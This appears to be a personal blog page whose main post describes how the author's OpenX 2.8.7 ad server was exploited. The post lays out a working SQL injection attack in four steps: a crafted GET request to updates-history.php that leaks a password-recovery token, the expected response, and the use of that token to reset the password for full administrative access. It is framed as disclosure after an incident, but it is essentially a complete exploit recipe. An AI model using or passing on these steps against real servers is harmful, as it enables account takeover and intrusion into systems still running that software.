The stolen mobi has been replaced!
Andrew Stevens
When 140 characters is not enough
Adam"
picplzAyden's new shirt
Wrapped
Ayden. Taking after me ;)
Melbourne Cup, over for another year
Oysters, gambling and the Melbourne Cup
Ducati
Free paper strips
OpenX 2.8.7 vulnerable to SQL Injection exploit
My team and I spent a couple of hours today tracking down how our OpenX ad server had been exploited. We are running 2.8.7 and can't wait to roll out OpenX Enterprise.
Step 1: Send a GET request as per the sample below.
http:// ads.yoursite.com/openx/www/admin/updates-history.php?xajax=expandOSURow&xajaxargs=9999%20union%20select%201,2,3,4,5,6,7,8,concat%288894389893459,0x3A,user_type,0x3A,recovery_id,0x3A,user_id%29%20as%20tablename_backup,10,11,12%20from%20ox_password_recovery--%20
Note, at the time our tables had a prefix of ox_.
Step 2: You should receive a response similar to the table below. You may get it as an XML string.
| Table origin | Backup table | Size | Rows |
|---|---|---|---|
| 8894389893459:user:D503-SOME-STRING-HERE:1 | 10 | 0 kb | |
| Total | 1 tables | 0 kb | 0 |
Step 3: Grab the user string (in red above) and append it to the following URL.
http:// ads.yoursite.com/openx/www/admin/password-recovery.php?id=D503-SOME-STRING-HERE
Step 4: Set a new password. You now have full system access.
